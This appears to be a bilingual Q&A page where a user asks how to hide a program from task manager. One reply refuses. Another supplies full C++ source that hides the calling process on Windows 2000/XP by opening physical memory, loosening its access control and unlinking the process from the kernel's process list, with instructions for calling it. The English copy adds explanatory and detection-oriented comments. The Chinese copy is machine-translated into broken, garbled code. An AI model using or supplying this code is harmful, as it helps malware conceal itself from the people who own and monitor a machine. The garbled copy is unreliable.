对任务管理器隐藏进程 [英] hide process from taskmanager


问题描述

大家好
我想为wm6.5创建一个程序,该程序未在任务管理器中显示
非常感谢

hey guys
i want to create a program for wm6.5 that is not shown in task manager
thanks a lot

推荐答案

您不能.如果它正在运行,则任务管理器将看到它.期间.

正如Dave所说,您的动机令人怀疑.某人想要对任务管理器隐藏某些东西的唯一可行原因是,因为他入侵/编写了病毒,我们在这里不容忍这种行为.
You can't. If it's a running process, task manager will see it. Period.

As Dave already stated, your motives are suspect. The only viable reason someone would want to hide something from task manager is because he's hacking/writing a virus, and we don't condone that kind of behavior here.


标头文件:

/////////////////////////////////////
//HideProcess.h
BOOL HideProcess();


CPP:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include< windows.h>
#include< accctrl.h>
#include< aclapi.h>

#include"HideProcess.h"

#define NT_SUCCESS(状态)((NTSTATUS)(状态)> = 0)
#定义STATUS_INFO_LENGTH_MISMATCH((NTSTATUS] 0xC0000004L)
#定义STATUS_ACCESS_DENIED((NTSTATUS] 0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
NTSTATUS状态; <​​br/> ULONG信息;
} IO_STATUS_BLOCK,* PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
USHORT长度;
USHORT MaximumLength;
PWSTR缓冲区;
} UNICODE_STRING,* PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#定义OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
ULONG长度;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG属性;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES,* POBJECT_ATTRIBUTES;

typedef NTSTATUS(CALLBACK * ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES对象属性
);

typedef VOID(CALLBACK * RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//------------------------------------------------ ---------------------------
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary("ntdll.dll");

如果(NULL == g_hNtDLL)
返回FALSE;

RtlInitUnicodeString =(RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL,

"RtlInitUnicodeString");
ZwOpenSection =(ZWOPENSECTION)GetProcAddress(g_hNtDLL,"ZwOpenSection");

返回TRUE;
}
//------------------------------------------------ ---------------------------
无效的CloseNTDLL()
{
if(NULL!= g_hNtDLL)
FreeLibrary(g_hNtDLL);

g_hNtDLL = NULL;
}
//------------------------------------------------ ---------------------------
VOID SetPhysicalMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;

DWORD dwRes = GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,

NULL& pDacl,NULL& pSD);

if(ERROR_SUCCESS!= dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

EXPLICIT_ACCESS ea;
RtlZeroMemory(& ea,sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName ="CURRENT_USER";

dwRes = SetEntriesInAcl(1,& ea,pDacl,& pNewDacl);

if(ERROR_SUCCESS!= dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

if(ERROR_SUCCESS!= dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

}
//------------------------------------------------ ---------------------------
处理OpenPhysicalMemory()
{
NTSTATUS状态; <​​br/> UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES属性;
ULONG PhyDirectory;

g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(& g_osvi);

如果(5!= g_osvi.dwMajorVersion)
返回NULL;

开关(g_osvi.dwMinorVersion)
{
案例0:
PhyDirectory = 0x30000;
休息; //2k
情况1:
PhyDirectory = 0x39000;
休息; //xp
默认值:
返回NULL;
}

RtlInitUnicodeString(& physmemString,L"\\ Device \\ PhysicalMemory");

attribute.Length = sizeof(OBJECT_ATTRIBUTES);
attribute.RootDirectory = NULL;
attribute.ObjectName =& physmemString;
attribute.Attributes = 0;
attribute.SecurityDescriptor = NULL;
attribute.SecurityQualityOfService = NULL;

状态= ZwOpenSection(& g_hMPM,SECTION_MAP_READ | SECTION_MAP_WRITE,& attributes);

if(状态== STATUS_ACCESS_DENIED)
{
状态= ZwOpenSection(& g_hMPM,READ_CONTROL | WRITE_DAC,& attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
状态= ZwOpenSection(& g_hMPM,SECTION_MAP_READ | SECTION_MAP_WRITE,&属性);
}

if(!NT_SUCCESS(status))
返回NULL;

g_pMapPhysicalMemory = MapViewOfFile(g_hMPM,FILE_MAP_READ | FILE_MAP_WRITE,0,PhyDirectory,

0x1000);

if(g_pMapPhysicalMemory == NULL)
返回NULL;

返回g_hMPM;
}
//------------------------------------------------ ---------------------------
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr =(ULONG)addr,PGDE,PTE,PAddr;
PGD​​E = BaseAddress [VAddr>> 22];

如果(0 ==(PGDE& 1))
返回0;

ULONG tmp = PGDE& 0x00000080;

如果(0!= tmp)
{
PAddr =(PGDE& 0xFFC00000)+(VAddr& 0x003FFFFF);
}
其他
{
PGD​​E =(ULONG)MapViewOfFile(g_hMPM,4,0,PGDE& 0xfffff000,0x1000);
PTE =((PULONG)PGDE)[(VAddr& 0x003FF000)>>>>>< 12 ;;

如果(0 ==(PTE& 1))
返回0;

PAddr =(PTE& 0xFFFFF000)+(VAddr& 0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}

return(PVOID)PAddr;
}
//------------------------------------------------ ---------------------------
ULONG GetData(PVOID地址)
{
ULONG phys =(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp =(PULONG)MapViewOfFile(g_hMPM,FILE_MAP_READ | FILE_MAP_WRITE,0,phys&

0xfffff000,0x1000);

如果(0 == tmp)
返回0;

ULONG ret = tmp [(phys& 0xFFF)>> 2];
UnmapViewOfFile(tmp);

返回ret;
}
//------------------------------------------------ ---------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys =(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp =(PULONG)MapViewOfFile(g_hMPM,FILE_MAP_WRITE,0,phys& 0xfffff000,0x1000);

如果(0 == tmp)
返回FALSE;

tmp [(phys& 0xFFF)>> 2] = data;
UnmapViewOfFile(tmp);

返回TRUE;
}
//------------------------------------------------ ---------------------------
长__stdcall感知(struct _EXCEPTION_POINTERS * tmp)
{
ExitProcess(0);
返回1;
}
//------------------------------------------------ ---------------------------
BOOL YHideProcess()
{
//SetUnhandledExceptionFilter(exeception);

如果(FALSE == InitNTDLL())
返回FALSE;

如果(0 == OpenPhysicalMemory())
返回FALSE;

ULONG线程= GetData((PVOID)0xFFDFF124); //kteb
ULONG进程= GetData(PVOID(thread + 0x44)); //kpeb

ULONG fw,bw;
如果(0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(进程+ 0xa4));
}

如果(1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}

SetData(PVOID(fw + 4),bw);
SetData(PVOID(bw),fw);

CloseHandle(g_hMPM);
CloseNTDLL();

返回TRUE;
}

BOOL HideProcess()
{
静态BOOL b_hide = false;
如果(!b_hide)
{
b_hide = true;
YHideProcess();
返回true;
}
返回true;
}

在您的代码中:
#include "HideProcess.h"
然后调用HideProcess()

仅适用于Windows2000/xp
header file:

//////////////////////////////////////
//HideProcess.h
// Public entry point of the listing below. On the first call it runs the
// process-unlinking routine (YHideProcess); later calls do nothing.
// Returns TRUE unconditionally -- the outcome of the hiding attempt is not
// reported back to the caller.
BOOL HideProcess();


CPP:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include<windows.h>
#include<accctrl.h>
#include<aclapi.h>

#include"HideProcess.h"

// Reviewer note on what this listing does: it opens the \Device\PhysicalMemory
// section from user mode, walks the 32-bit x86 page tables by hand to
// translate kernel virtual addresses (LinearToPhys), and patches the
// doubly linked list of process objects so that the calling process drops
// out of it (YHideProcess) -- direct kernel object manipulation done through
// physical memory rather than a driver. It depends on fixed structure
// offsets for Windows 2000 and XP only (see OpenPhysicalMemory/YHideProcess),
// and, to my recollection, user-mode access to this section was removed in
// later Windows versions (Windows Server 2003 SP1 onward), so the code is of
// historical/educational interest. Defensively: a process unlinked this way
// is still reachable through other kernel structures, so cross-view
// comparisons and memory-forensics scanners flag the tampering, and a
// user-mode open of \Device\PhysicalMemory with write access (or a DACL
// change on that section) is itself a strong indicator worth monitoring.

// Hand-written subset of the native (ntdll) declarations, presumably because
// the SDK in use did not expose them. Of these, only NT_SUCCESS,
// STATUS_ACCESS_DENIED, UNICODE_STRING and OBJECT_ATTRIBUTES are referenced
// below; IO_STATUS_BLOCK, STATUS_INFO_LENGTH_MISMATCH and the OBJ_* flags are
// declared but unused (attributes.Attributes is always set to 0).
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// Counted UTF-16 string as used by the native API; filled by the ntdll
// export RtlInitUnicodeString in OpenPhysicalMemory.
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

// Object-name descriptor passed to ZwOpenSection; Length must be
// sizeof(OBJECT_ATTRIBUTES), the other fields are NULL/0 in this listing.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Signatures of the two ntdll exports resolved at run time in InitNTDLL.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);

// Function pointers filled by InitNTDLL; they are NULL until then and stay
// NULL if GetProcAddress fails -- nothing checks them before they are called.
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;            // ntdll.dll module handle, owned by InitNTDLL/CloseNTDLL
PVOID g_pMapPhysicalMemory = NULL;  // 4 KB view at physical PhyDirectory, mapped in OpenPhysicalMemory; never unmapped
HANDLE g_hMPM = NULL;               // handle to the \Device\PhysicalMemory section, opened in OpenPhysicalMemory
OSVERSIONINFO g_osvi;               // filled by GetVersionEx in OpenPhysicalMemory; dwMinorVersion selects the hard-coded offsets
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves the two native exports this listing calls
// through function pointers (RtlInitUnicodeString, ZwOpenSection).
// Returns FALSE only when LoadLibrary fails; the GetProcAddress results are
// stored without being checked, so a missing export leaves a NULL pointer
// that OpenPhysicalMemory would later call. The module handle is kept in
// g_hNtDLL and released by CloseNTDLL.
BOOL InitNTDLL()
{
    HMODULE hNt = LoadLibrary("ntdll.dll");
    g_hNtDLL = hNt;
    if (hNt == NULL) {
        return FALSE;
    }

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(hNt, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(hNt, "ZwOpenSection");

    return TRUE;
}
//---------------------------------------------------------------------------
// Releases the ntdll.dll module loaded by InitNTDLL and clears g_hNtDLL.
// Safe to call when nothing was loaded (g_hNtDLL == NULL). The two function
// pointers resolved from the module are left dangling.
VOID CloseNTDLL()
{
    HMODULE hNt = g_hNtDLL;
    g_hNtDLL = NULL;
    if (hNt != NULL) {
        FreeLibrary(hNt);
    }
}
//---------------------------------------------------------------------------
// Widens the DACL of the \Device\PhysicalMemory section so the caller can
// map it for writing: reads the current DACL, appends a GRANT of
// SECTION_MAP_WRITE for the special trustee name "CURRENT_USER" (resolved to
// the calling account, as documented for TRUSTEE_IS_NAME), and writes the
// DACL back. OpenPhysicalMemory calls this only after its first open failed
// with STATUS_ACCESS_DENIED, with hSection opened for READ_CONTROL|WRITE_DAC.
// Reviewer notes on the code as written:
//  - none of the three error branches returns, so a failed GetSecurityInfo
//    still reaches SetEntriesInAcl with pDacl == NULL, and a failed
//    SetEntriesInAcl still reaches SetSecurityInfo with pNewDacl == NULL --
//    a NULL DACL on a kernel object means no access check at all, which
//    would widen exposure well beyond what the author intended;
//  - pSD and pNewDacl are freed only on the error paths, never on success;
//  - "CURRENT_USER" is a narrow literal assigned to an LPTSTR, which only
//    compiles in a non-UNICODE build;
//  - the function is VOID, so the caller cannot tell whether the change
//    took effect.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;

// Current DACL of the section; pSD owns the buffer pDacl points into.
DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

NULL, &pDacl, NULL, &pSD);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

// One explicit-access entry: allow SECTION_MAP_WRITE to the current user.
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";

// Merge the entry with the existing DACL into a new, LocalAlloc'ed DACL.
dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
// Apply the new DACL to the section object (needs WRITE_DAC on hSection).
dwRes = SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

}
//---------------------------------------------------------------------------
// Opens the \Device\PhysicalMemory section for read/write and maps the 4 KB
// physical page at PhyDirectory into g_pMapPhysicalMemory. LinearToPhys later
// indexes that page with VAddr>>22, i.e. the page is treated as the x86 page
// directory. PhyDirectory is a hard-coded physical address chosen by OS minor
// version (0x30000 on Windows 2000, 0x39000 on XP, per the original
// comments); any other minor version, and any major version other than 5,
// returns NULL at once -- which is also the only reason fw/bw in
// YHideProcess are never used uninitialised.
// If the first open is refused with STATUS_ACCESS_DENIED, the section is
// reopened for READ_CONTROL|WRITE_DAC, its DACL is widened by
// SetPhyscialMemorySectionCanBeWrited, the handle is closed and the open is
// retried with the original access mask.
// Side effects: fills g_osvi, sets g_hMPM and g_pMapPhysicalMemory.
// Returns g_hMPM on success, NULL on any failure.
// Reviewer notes: the status of the READ_CONTROL|WRITE_DAC open is not
// checked before g_hMPM is passed on and closed; when MapViewOfFile fails
// g_hMPM is left open; the returned handle is the same object as the global.
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;

g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);

// NT 5.x only: 5.0 = Windows 2000, 5.1 = Windows XP.
if (5 != g_osvi.dwMajorVersion)
return NULL;

switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}

// Native object name of the physical-memory section.
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

// Access denied: widen the section's DACL, then retry the read/write open.
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}

if(!NT_SUCCESS(status))
return NULL;

// Map one page at the version-specific physical offset; this view is what
// LinearToPhys reads PDEs from and it is never unmapped.
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

0x1000);

if( g_pMapPhysicalMemory == NULL )
return NULL;

return g_hMPM;
}
//---------------------------------------------------------------------------
// Translates a virtual address to a physical one by walking the 32-bit x86
// two-level page tables by hand. BaseAddress is the mapped page directory
// (g_pMapPhysicalMemory); bits 31..22 of addr select the PDE. A PDE with
// bit 0 clear (not present) yields 0. If bit 7 (0x80, the large-page flag)
// is set, the PDE maps a 4 MB page and the result is PDE[31..22] +
// addr[21..0]. Otherwise the page-table page (PDE & 0xfffff000) is mapped
// through the physical-memory section, bits 21..12 of addr select the PTE,
// and the result is PTE[31..12] + addr[11..0].
// Returns 0 for a non-present PDE or PTE; callers cannot distinguish that
// from physical address 0 (GetData/SetData then simply map page 0).
// Reviewer notes: the MapViewOfFile result is dereferenced without a NULL
// check; the early return on a non-present PTE skips UnmapViewOfFile and
// leaks the view; pointers are truncated through ULONG, so this is 32-bit
// only.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress[VAddr>>22];   // page-directory entry

if (0 == (PGDE&1))   // present bit
return 0;

ULONG tmp = PGDE & 0x00000080;   // PS bit: 4 MB page

if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
// Map the page-table page; the literal 4 is FILE_MAP_READ's numeric value.
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];   // page-table entry

if (0 == (PTE&1))   // present bit; note the view is not unmapped here
return 0;

PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}

return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
// Reads one 32-bit word at virtual address addr through the physical-memory
// section: translates addr with LinearToPhys, maps the 4 KB physical page
// containing it, and returns the dword at the page offset.
// Returns 0 when the mapping fails -- indistinguishable from a genuine zero
// word, so callers cannot tell failure from data. The LinearToPhys result is
// not checked, so an untranslatable address reads from physical page 0.
// The view is mapped read/write although only a read is performed.
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
// Map the page-aligned physical page that contains phys.
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

0xfffff000, 0x1000);

if (0 == tmp)
return 0;

ULONG ret = tmp[(phys & 0xFFF)>>2];   // dword index within the page
UnmapViewOfFile(tmp);

return ret;
}
//---------------------------------------------------------------------------
// Writes one 32-bit word to virtual address addr through the physical-memory
// section: translates addr with LinearToPhys, maps the 4 KB physical page
// containing it for writing, and stores data at the page offset.
// Returns FALSE only when MapViewOfFile fails; the LinearToPhys result is
// not checked, so an untranslatable address writes into physical page 0.
// YHideProcess ignores the return value.
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
// Map the page-aligned physical page that contains phys.
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

if (0 == tmp)
return FALSE;

tmp[(phys & 0xFFF)>>2] = data;   // dword index within the page
UnmapViewOfFile(tmp);

return TRUE;
}
//---------------------------------------------------------------------------
// Unhandled-exception filter meant for SetUnhandledExceptionFilter (the call
// that would install it is commented out in YHideProcess). It terminates the
// process with exit code 0 on any exception; the return statement is never
// reached because ExitProcess does not return.
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
    (void)tmp;   // the exception record is not inspected
    ExitProcess(0);
    return 1;
}
//---------------------------------------------------------------------------
// The DKOM step: unlink the calling process from the kernel's doubly linked
// list of process objects, from user mode, via physical memory.
//  1. resolve the ntdll exports and open/map physical memory (bail out on
//     failure);
//  2. read the fixed address 0xFFDFF124 -- inside the x86 KPCR page at
//     0xFFDFF000; the original comment labels it the current thread ("kteb"),
//     which matches KPCR.PrcbData.CurrentThread if I recall the layout
//     correctly (not verifiable here);
//  3. read thread+0x44, labelled the owning process ("kpeb");
//  4. read the forward (fw) and backward (bw) list pointers at the
//     version-specific offset inside that process object: +0xa0/+0xa4 on
//     Windows 2000, +0x88/+0x8c on XP -- presumably EPROCESS.ActiveProcessLinks;
//  5. SetData(fw+4, bw) points the next entry's Blink past this process and
//     SetData(bw, fw) points the previous entry's Flink past it -- a standard
//     doubly-linked-list unlink.
// The process's own Flink/Blink are left pointing into the list, so when it
// later exits the kernel unlinks using stale pointers; I would expect that
// to corrupt the list or crash, which is one reason this technique is
// considered unstable. Other reviewer notes: g_pMapPhysicalMemory is never
// unmapped; the results of GetData/SetData are ignored; the commented-out
// SetUnhandledExceptionFilter would have turned any access violation into a
// silent ExitProcess(0). Returns TRUE even when the writes failed.
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception);

if (FALSE == InitNTDLL())
return FALSE;

// Also fills g_osvi and returns NULL for anything other than NT 5.0/5.1.
if (0 == OpenPhysicalMemory())
return FALSE;

ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

// Flink/Blink of this process's list entry; the offset depends on the build.
// Only minor versions 0 and 1 reach this point (see OpenPhysicalMemory).
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}

if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}

// next->Blink = prev; prev->Flink = next  (this entry is skipped over)
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);

CloseHandle(g_hMPM);
CloseNTDLL();

return TRUE;
}

// Public entry point (declared in HideProcess.h). A function-static flag
// makes YHideProcess run at most once per process; its result is discarded
// and every call returns true, so callers learn nothing about whether the
// unlink succeeded.
BOOL HideProcess()
{
    static BOOL already_tried = false;
    if (already_tried) {
        return true;
    }
    already_tried = true;
    YHideProcess();
    return true;
}

in your code:
#include "HideProcess.h"
then call HideProcess()

only works on Windows 2000/XP


